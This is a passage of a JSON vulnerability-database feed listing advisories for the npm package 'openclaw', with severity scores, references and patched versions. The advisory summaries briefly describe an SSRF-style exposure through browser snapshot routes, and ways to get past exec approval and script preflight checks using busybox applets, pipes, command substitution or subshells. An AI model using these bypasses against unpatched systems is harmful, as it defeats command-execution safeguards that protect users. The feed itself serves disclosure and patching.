                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mw7w-g3mg-xqm7",
                    "reference_id": "GHSA-mw7w-g3mg-xqm7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mw7w-g3mg-xqm7"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "GHSA-mw7w-g3mg-xqm7"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6bxd-kbse-sudx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89059?format=api",
            "vulnerability_id": "VCID-6wth-qthz-yud8",
            "summary": "OpenClaw: Browser snapshot and screenshot routes could expose internal page content after navigation\n## Summary\n\nBrowser snapshot and screenshot routes could expose internal page content after navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAuthenticated browser tool callers could use snapshot, screenshot, or tab routes that did not consistently validate the final browser target after route-driven navigation. In restrictive browser SSRF configurations this could expose content from internal or otherwise disallowed pages.\n\n## Technical Details\n\nThe fix re-checks browser snapshot, screenshot, and tab route results against the configured browser SSRF policy before returning page content. Regression coverage was added around snapshot/screenshot and tab-route flows.\n\n## Fix\n\nThe issue was fixed in #66040. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `b75ad800a59009fc47eaa3471410f69046150e59`\n- PR: #66040\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42436",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09041",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10552",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1059",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42436"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66040",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66040"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42436",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42436"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c4qm-58hj-j6pj",
                    "reference_id": "GHSA-c4qm-58hj-j6pj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c4qm-58hj-j6pj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.14",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"
                }
            ],
            "aliases": [
                "CVE-2026-42436",
                "GHSA-c4qm-58hj-j6pj"
            ],
            "risk_score": 3.5,
            "exploitability": "0.5",
            "weighted_severity": "6.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6wth-qthz-yud8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89630?format=api",
            "vulnerability_id": "VCID-6y5w-am4s-6qa5",
            "summary": "OpenClaw: busybox and toybox applet execution weakened exec approval binding\n## Summary\n\nApplet execution through the `busybox` and `toybox` multi-call binaries weakened exec approval binding, because the invocation could obscure which applet would actually run.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.23 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nOpaque multi-call binaries such as `busybox` and `toybox` could obscure which applet or script-like behavior would actually run, weakening exec approval binding and risk classification.\n\n## Technical Details\n\nThe fix treats `busybox` and `toybox` as opaque mutable script runners and fails closed rather than binding unsafe applet invocations.\n\n## Fix\n\nThe issue was fixed in #65713. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `666f48d9b882a8a1415ca53f9567c72499d850c9`\n- PR: #65713\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43530",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0006",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19015",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21375",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21421",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43530"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/65713",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/65713"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43530",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43530"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2cq5-mf3v-mx44",
                    "reference_id": "GHSA-2cq5-mf3v-mx44",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2cq5-mf3v-mx44"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.12",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"
                }
            ],
            "aliases": [
                "CVE-2026-43530",
                "GHSA-2cq5-mf3v-mx44"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6y5w-am4s-6qa5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89784?format=api",
            "vulnerability_id": "VCID-733f-57ds-xugm",
            "summary": "Duplicate Advisory: OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rf75-g96h-j3rm",
                    "reference_id": "GHSA-rf75-g96h-j3rm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rf75-g96h-j3rm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
